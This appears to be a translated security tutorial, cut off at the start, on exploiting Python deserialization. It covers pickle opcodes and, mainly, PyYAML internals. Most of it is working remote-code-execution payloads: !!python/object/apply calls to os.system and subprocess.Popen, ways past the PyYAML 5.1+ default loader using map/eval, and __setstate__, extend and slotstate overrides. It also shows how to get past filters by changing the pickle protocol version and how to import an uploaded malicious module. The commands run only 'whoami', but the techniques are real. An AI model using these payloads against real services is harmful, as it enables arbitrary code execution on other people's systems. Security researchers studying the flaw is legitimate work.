       73: X        BINUNICODE '__builtins__'
       90: o        OBJ        (MARK at 50)
       91: q    BINPUT     2
       93: (    MARK
       94: h        BINGET     0
       96: h        BINGET     2
       98: X        BINUNICODE 'eval'
      107: o        OBJ        (MARK at 93)
      108: q    BINPUT     3
      110: (    MARK
      111: h        BINGET     3
      113: X        BINUNICODE '__import__("os").system("whoami")'
      151: o        OBJ        (MARK at 110)
      152: 0    POP
      153: 0    POP
      154: .    STOP
    highest protocol among opcodes = 2
    lewiserii\lewiserii
    '''
 
opcode version
Filters on particular letters can sometimes be bypassed by switching to a different opcode version.
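As a rough illustration of why the version matters, the sketch below pickles the same global reference (the built-in len, chosen arbitrarily) with protocol 0 and protocol 4. The exact bytes may vary slightly between Python versions, but protocol 0 uses the text-based GLOBAL opcode c while protocol 4 uses STACK_GLOBAL (\x93).

```python
import pickle

p0 = pickle.dumps(len, protocol=0)
p4 = pickle.dumps(len, protocol=4)
print(p0)
print(p4)

# A filter written against the protocol-0 form does not match the protocol-4 form.
needle = b"c__builtin__"
hits = (needle in p0, needle in p4)
print(hits)

# Both streams still load to the same object.
same = pickle.loads(p0) is len and pickle.loads(p4) is len
print(same)
```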
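PyYAML deserialization
Basic syntax rules
1: Case sensitive
2: Indentation with spaces (not tabs) expresses nesting; items aligned at the same column are at the same level
3: As in Python, '#' starts a comment
4: !! denotes an explicit type conversion
5: A single .yml file can contain several documents, separated by ---
More syntax rules can be found in the official manual or in tutorials such as Runoob (菜鸟教程).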
Type conversion
In PyYAML, !! is used for type conversion.
The basic conversion logic can be found in site-packages/yaml/constructor.py.
For example:
    import yaml

    data = yaml.load('!!str 111')
    print(data)
    print(type(data))

    '''
    111
    <type 'str'>
    '''
 
The corresponding code is shown below. add_constructor registers the basic type conversions.
    SafeConstructor.add_constructor(
            u'tag:yaml.org,2002:str',
            SafeConstructor.construct_yaml_str)

    def add_constructor(cls, tag, constructor):
        if not 'yaml_constructors' in cls.__dict__:
            cls.yaml_constructors = cls.yaml_constructors.copy()
        cls.yaml_constructors[tag] = constructor
    add_constructor = classmethod(add_constructor)
 
The function registered for str is construct_yaml_str. Setting a breakpoint there shows the following call chain:
    def construct_yaml_str(self, node):
        value = self.construct_scalar(node)
        try:
            return value.encode('ascii')
        except UnicodeEncodeError:
            return value

    # SafeConstructor.construct_scalar
    def construct_scalar(self, node):
        if isinstance(node, MappingNode):
            for key_node, value_node in node.value:
                if key_node.tag == u'tag:yaml.org,2002:value':
                    return self.construct_scalar(value_node)
        return BaseConstructor.construct_scalar(self, node)

    # BaseConstructor.construct_scalar
    def construct_scalar(self, node):
        if not isinstance(node, ScalarNode):
            raise ConstructorError(None, None,
                    "expected a scalar node, but found %s" % node.id,
                    node.start_mark)
        return node.value
 
This shows the conversion process, including the value of the node.
Besides the basic types registered through add_constructor, there are five complex Python tags registered through add_multi_constructor:
    Constructor.add_multi_constructor(
        u'tag:yaml.org,2002:python/name:',
        Constructor.construct_python_name)

    Constructor.add_multi_constructor(
        u'tag:yaml.org,2002:python/module:',
        Constructor.construct_python_module)

    Constructor.add_multi_constructor(
        u'tag:yaml.org,2002:python/object:',
        Constructor.construct_python_object)

    Constructor.add_multi_constructor(
        u'tag:yaml.org,2002:python/object/apply:',
        Constructor.construct_python_object_apply)

    Constructor.add_multi_constructor(
        u'tag:yaml.org,2002:python/object/new:',
        Constructor.construct_python_object_new)
 
All of these tags can bring in new modules, which is exactly why PyYAML is exposed to deserialization vulnerabilities.
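PyYAML < 5.1
Exploitation of PyYAML is divided at version 5.1. Versions below 5.1 are relatively easy to exploit, and versions from 5.1 on take somewhat more work.
Versions below 5.1 have three constructors:
BaseConstructor: the most basic constructor; it does not support explicit type conversion
SafeConstructor: inherits from BaseConstructor; its type conversions follow the YAML specification without modification
Constructor: adds many type conversions on top of the YAML specification and is the constructor used by default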
 
python/object/apply
The handler is construct_python_object_apply:
    def construct_python_object_apply(self, suffix, node, newobj=False):
        # A sequence node supplies positional arguments only
        if isinstance(node, SequenceNode):
            args = self.construct_sequence(node, deep=True)
            kwds = {}
            state = {}
            listitems = []
            dictitems = {}
        # A mapping node may supply args, kwds, state, listitems, dictitems
        else:
            value = self.construct_mapping(node, deep=True)
            args = value.get('args', [])
            kwds = value.get('kwds', {})
            state = value.get('state', {})
            listitems = value.get('listitems', [])
            dictitems = value.get('dictitems', {})
        # Resolve the name in the tag suffix and call it
        instance = self.make_python_instance(suffix, node, args, kwds, newobj)
        if state:
            self.set_python_instance_state(instance, state)
        if listitems:
            instance.extend(listitems)
        if dictitems:
            for key in dictitems:
                instance[key] = dictitems[key]
        return instance
 
It calls make_python_instance to look up the named callable in the module and execute it.
payload
    yaml.load('!!python/object/apply:os.system ["whoami"]')
    yaml.load("!!python/object/apply:os.system ['whoami']")
    yaml.load("!!python/object/apply:os.system [whoami]")
    yaml.load("!!python/object/apply:subprocess.Popen ['whoami']")

    yaml.load("exp: !!python/object/apply:os.system [whoami]")

    yaml.load("""
    exp: !!python/object/apply:os.system
    - whoami
    """)

    yaml.load("""
    exp: !!python/object/apply:os.system
      args: ["whoami"]
    """)

    yaml.load("""
    exp: !!python/object/apply:os.system
      kwds: {"command": "whoami"}
    """)

    yaml.load("""
    !!python/object/apply:os.system
    - whoami
    """)
 
python/object/new
The corresponding construct_python_object_new is a single line that calls construct_python_object_apply:
    def construct_python_object_new(self, suffix, node):
        return self.construct_python_object_apply(suffix, node, newobj=True)
 
The only difference is the newobj argument, which affects one branch in make_python_instance:
    if newobj and isinstance(cls, type):
        return cls.__new__(cls, *args, **kwds)
    else:
        return cls(*args, **kwds)
 
In most cases this makes no practical difference, so python/object/new and python/object/apply can be treated as the same thing here.
python/object
    def construct_python_object(self, suffix, node):
        # Create the instance without passing args or kwds
        instance = self.make_python_instance(suffix, node, newobj=True)
        yield instance
        deep = hasattr(instance, '__setstate__')
        state = self.construct_mapping(node, deep=deep)
        self.set_python_instance_state(instance, state)
 
make_python_instance is called without args or kwds here, so only callables that take no arguments can be executed.
For example:
    import yaml

    class User:
        def __init__(self):
            self.name = ""

    payload1 = """!!python/object:__main__.User
    name: aaa
    """
    payload2 = "!!python/object:__main__.User {name: aaa}"

    data1 = yaml.load(payload1)
    print(data1.name)

    data2 = yaml.load(payload2)
    print(data2.name)

    '''
    aaa
    aaa
    '''
 
python/module
The code only calls find_python_module to import the module:
    def construct_python_module(self, suffix, node):
        value = self.construct_scalar(node)
        if value:
            raise ConstructorError("while constructing a Python module", node.start_mark,
                    "expected the empty value, but found %r" % value, node.start_mark)
        return self.find_python_module(suffix, node.start_mark)
 
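Although construct_python_module does not call anything itself, importing a module runs its top-level code, so it works very well in combination with an arbitrary file upload.
Suppose a malicious file exp.py has been uploaded to the upload directory.
It can then be imported with !!python/module:upload.exp
    import yaml

    yaml.load('!!python/module:upload.exp')

    '''
    root
    '''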
 
A small trick: if the file is named __init__.py, importing the directory name is enough, which bypasses restrictions on the . character.
python/name
The logic is very similar to python/module, except that module returns only the module while name returns an attribute or method of a module.
    def construct_python_name(self, suffix, node):
        value = self.construct_scalar(node)
        if value:
            raise ConstructorError("while constructing a Python name", node.start_mark,
                    "expected the empty value, but found %r" % value, node.start_mark)
        return self.find_python_name(suffix, node.start_mark)
 
This feature is commonly used to read the value of an unknown variable:
    import yaml

    key = "k1y....."
    config = '!!python/name:__main__.key'
    print(yaml.load(config))

    '''
    k1y.....
    '''
 
PyYAML >= 5.1
Newly added constructors:
1: FullConstructor: the default constructor
2: UnsafeConstructor: supports all explicit type conversions
3: Constructor: equivalent to UnsafeConstructor
    __all__ = [
        'BaseConstructor',
        'SafeConstructor',
        'FullConstructor',
        'UnsafeConstructor',
        'Constructor',
        'ConstructorError'
    ]
 
If the constructor in use is UnsafeConstructor or Constructor, the techniques for versions below 5.1 work unchanged:
    yaml.unsafe_load(exp)
    yaml.unsafe_load_all(exp)
    yaml.load(exp, Loader=Loader)
    yaml.load(exp, Loader=UnsafeLoader)
    yaml.load_all(exp, Loader=Loader)
    yaml.load_all(exp, Loader=UnsafeLoader)
 
Exploitation under the default constructor
PyYAML==5.1 is used as the example here.
    def make_python_instance(self, suffix, node,
            args=None, kwds=None, newobj=False, unsafe=False):
        if not args:
            args = []
        if not kwds:
            kwds = {}
        cls = self.find_python_name(suffix, node.start_mark)
        if not (unsafe or isinstance(cls, type)):
            raise ConstructorError("while constructing a Python instance", node.start_mark,
                    "expected a class, but found %r" % type(cls),
                    node.start_mark)
        if newobj and isinstance(cls, type):
            return cls.__new__(cls, *args, **kwds)
        else:
            return cls(*args, **kwds)

    def find_python_name(self, name, mark, unsafe=False):
        if not name:
            raise ConstructorError("while constructing a Python object", mark,
                    "expected non-empty name appended to the tag", mark)
        if '.' in name:
            module_name, object_name = name.rsplit('.', 1)
        else:
            module_name = 'builtins'
            object_name = name
        if unsafe:
            try:
                __import__(module_name)
            except ImportError as exc:
                raise ConstructorError("while constructing a Python object", mark,
                        "cannot find module %r (%s)" % (module_name, exc), mark)
        if not module_name in sys.modules:
            raise ConstructorError("while constructing a Python object", mark,
                    "module %r is not imported" % module_name, mark)
        module = sys.modules[module_name]
        if not hasattr(module, object_name):
            raise ConstructorError("while constructing a Python object", mark,
                    "cannot find %r in the module %r"
                    % (object_name, module.__name__), mark)
        return getattr(module, object_name)
 
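As the code shows, an `unsafe` flag has been introduced, and with `unsafe=False` the following two rules apply:
```python
# Rule 1: the resolved name must be a class (an instance of type), otherwise ConstructorError is raised
if not (unsafe or isinstance(cls, type))

# Rule 2: the module must already be imported (present in sys.modules), otherwise ConstructorError is raised
if not module_name in sys.modules
```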
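As a rough illustration of these two rules, the sketch below re-implements them with the standard library only. The helper name `passes_default_checks` is hypothetical and not part of PyYAML; it only mirrors the `sys.modules` lookup and the `isinstance(cls, type)` test from the excerpt above, assuming `unsafe=False`.

```python
import os          # imported so that "os" is present in sys.modules
import subprocess  # imported so that "subprocess" is present in sys.modules
import sys


def passes_default_checks(dotted_name):
    """Hypothetical helper: would this name survive both rules with unsafe=False?"""
    if "." in dotted_name:
        module_name, object_name = dotted_name.rsplit(".", 1)
    else:
        module_name, object_name = "builtins", dotted_name
    # Rule 2: the module must already be imported.
    if module_name not in sys.modules:
        return False
    module = sys.modules[module_name]
    if not hasattr(module, object_name):
        return False
    # Rule 1: the resolved object must be a class.
    return isinstance(getattr(module, object_name), type)


candidates = ("subprocess.Popen", "os.system", "map", "eval",
              "module_that_is_not_imported.Thing")
results = {name: passes_default_checks(name) for name in candidates}
```

In this sketch `subprocess.Popen` and `map` pass because both are classes in loaded modules, while `os.system` and `eval` are plain functions and fail the class check, which fits the choice of `Popen` and `map` in the methods that follow.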
 
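Method 1:
The simplest approach is to walk the `sys.modules` dictionary and look for a class, in a module that satisfies the rules above, that can execute commands.
For example, `subprocess.Popen`:
```python
yaml.load("!!python/object/apply:subprocess.Popen [whoami]")
```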
 
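Method 2:
Use `map` to trigger the function call.
For example, `map(eval, ["__import__('os').system('whoami')"])`
Note that in Python 2 `map` returns the results directly, whereas in Python 3 it returns a lazy map object, so another function is needed to iterate over it before anything is executed.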
 
```python
list(map(eval, ["__import__('os').system('whoami')"]))
set(map(eval, ["__import__('os').system('whoami')"]))
tuple(map(eval, ["__import__('os').system('whoami')"]))
frozenset(map(eval, ["__import__('os').system('whoami')"]))
bytes(map(eval, ["__import__('os').system('whoami')"]))
```
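The laziness of the Python 3 `map` object can be observed with a harmless function. In the minimal sketch below, `record` is a made-up stand-in for the function being mapped; it only logs its argument, which makes it visible when the calls actually happen.

```python
calls = []


def record(value):
    """Stand-in for the mapped function: remember each argument it receives."""
    calls.append(value)
    return value


lazy = map(record, ["a", "b"])
calls_before = list(calls)   # nothing has been called yet

consumed = tuple(lazy)       # iterating the map object triggers the calls
calls_after = list(calls)
```

Creating the map object alone calls nothing; the function runs only when a consumer such as `tuple` iterates over it.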
 
Converted to YAML:
```python
import yaml

# Builds only the lazy map object; nothing is evaluated until it is iterated
yaml.load("""
!!python/object/new:map
  - !!python/name:eval
  - ["__import__('os').system('whoami')"]
""")

yaml.load("""
!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - ["__import__('os').system('whoami')"]
""")

yaml.load("""
!!python/object/new:frozenset
- !!python/object/new:map
  - !!python/name:eval
  - ["__import__('os').system('whoami')"]
""")

yaml.full_load("""
!!python/object/new:bytes
- !!python/object/new:map
  - !!python/name:eval
  - ["__import__('os').system('whoami')"]
""")
```
 
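There is a catch here: with `!!python/object/new`, only types such as `tuple`, `frozenset`, and `bytes` can be used to iterate over the map object; `list` and `set` do not work (under `!!python/object/apply` there is no such problem).
This follows from the difference between `python/object/new` and `python/object/apply` mentioned earlier.
`construct_python_object_new` calls `construct_python_object_apply` with `newobj` set to true, so the condition below holds and `cls.__new__(cls, *args, **kwds)` is called instead of `cls(*args, **kwds)`.
```python
if newobj and isinstance(cls, type):
    return cls.__new__(cls, *args, **kwds)
else:
    return cls(*args, **kwds)
```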
 
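These types are implemented differently under the hood, so some of them cannot receive values through `__new__`: `list` and `set` fill themselves in `__init__` and ignore the arguments given to `__new__`, so the map object is never iterated, while the immutable types `tuple`, `frozenset`, and `bytes` consume their argument inside `__new__`.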
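This difference can be checked directly on CPython without PyYAML. The sketch below calls `cls.__new__(cls, ...)` the same way the `newobj` branch does, but with a harmless `record` function (a made-up name) in place of `eval`, and notes which types actually pull values out of the map object.

```python
seen = []


def record(value):
    """Stand-in for the mapped function: log every value that gets evaluated."""
    seen.append(value)
    return value


def build_via_new(cls):
    """Return (object built by cls.__new__, values that were pulled from the map)."""
    seen.clear()
    obj = cls.__new__(cls, map(record, [1, 2, 3]))
    return obj, list(seen)


outcome = {cls.__name__: build_via_new(cls)
           for cls in (list, set, tuple, frozenset, bytes)}

# Types whose __new__ never iterated the map object
never_iterated = sorted(name for name, (_, pulled) in outcome.items() if not pulled)
```

Here `list` and `set` come back empty and `record` is never called, while `tuple`, `frozenset`, and `bytes` iterate the map inside `__new__`.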
Other methods:
Reading further into the `!!python/object/new` code, besides the call to `make_python_instance` there are three more checks. The earlier payloads never reached them because they did not supply the corresponding values.
```python
if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
```
 
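First, when `listitems` is present, the `extend` method of `instance` is called. So we can create a class with an attribute named `extend` that is actually `eval`, which makes `instance.extend(listitems)` equivalent to `eval(listitems)`.
```python
a = type("rce", (), {"extend": eval})
a.extend("__import__('os').system('whoami')")
```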
 
Converted to YAML:
```python
yaml.full_load("""
!!python/object/new:type
args:
  - rce
  - !!python/tuple []
  - {"extend": !!python/name:eval }
listitems: "__import__('os').system('whoami')"
""")
```
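One detail that makes this trick work is that a builtin function stored as a class attribute is not bound as a method, so the argument is passed through unchanged. The sketch below shows this with the harmless builtin `len` standing in for `eval`; `Holder` and `python_function` are made-up names for illustration.

```python
def python_function(*args):
    """A function written in Python, to contrast with a builtin."""
    return args


Holder = type("Holder", (), {"extend": len, "bound": python_function})

on_class = Holder.extend("abc")        # plain len("abc")
on_instance = Holder().extend("abc")   # still len("abc"): no self is inserted
bound_args = Holder().bound("abc")     # a Python function receives (instance, "abc")
```

Because builtins like `len` or `eval` do not take part in method binding, `instance.extend(listitems)` reaches them with `listitems` as the only argument, whether `instance` is the class itself or an object of that class.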
 
`state` can be exploited in the same way: by replacing `__setstate__`, a function of our choice gets executed (similar to abusing `__setstate__` for command execution in pickle).
```python
def set_python_instance_state(self, instance, state):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            setattr(object, key, value)
```
 
```python
a = type("rce", (), {"__setstate__": eval})
a.__setstate__("__import__('os').system('whoami')")
```
 
Converted to YAML:
```python
yaml.full_load("""
!!python/object/new:type
args:
  - rce
  - !!python/tuple []
  - {"__setstate__": !!python/name:eval }
state: "__import__('os').system('whoami')"
""")
```
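The dispatch on `__setstate__` can be traced without PyYAML. The following is a simplified sketch rather than the library's code: `apply_state` is a hypothetical helper that mirrors only the `__setstate__` and `__dict__` branches quoted above (slot handling is left out), and a list's `append` method stands in for `eval` so that nothing is executed.

```python
def apply_state(instance, state):
    """Hypothetical, simplified mirror of the state dispatch (slots omitted)."""
    if hasattr(instance, "__setstate__"):
        instance.__setstate__(state)      # attacker-chosen callable runs here
        return "__setstate__"
    if hasattr(instance, "__dict__"):
        instance.__dict__.update(state)   # ordinary objects just get attributes
        return "__dict__"
    return "unhandled"


received = []

# A class built with type(), as in the payload; append stands in for eval.
Demo = type("Demo", (), {"__setstate__": received.append})
hijacked_branch = apply_state(Demo, "state-value")


class Plain:
    pass


plain = Plain()
plain_branch = apply_state(plain, {"x": 1})
```

With the crafted class the state value is handed straight to the substituted callable, whereas an ordinary object only has its attributes updated.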
 
Summary: wherever an instance method gets called, we can construct an instance whose method has been replaced with a malicious function, and our code will be executed.
For example, `slotstate.update(state)` in `set_python_instance_state` can also lead to RCE:
```python
yaml.full_load("""
!!python/object/new:type
  args: []
  state: !!python/tuple
    - "__import__('os').system('whoami')"
    - !!python/object/new:type
      args:
        - exp
        - !!python/tuple []
        - {"update": !!python/name:exec , "items": !!python/name:list }
""")

yaml.full_load("""
!!python/object/new:str
    args: []
    state: !!python/tuple
      - "__import__('os').system('whoami')"
      - !!python/object/new:staticmethod
        args: []
        state:
          update: !!python/name:eval
          items: !!python/name:list
""")
```
 
References: SecMap - 反序列化(Python); python反序列化详解; Python pickle反序列化浅析; Pickle反序列化; SecMap - 反序列化(PyYAML)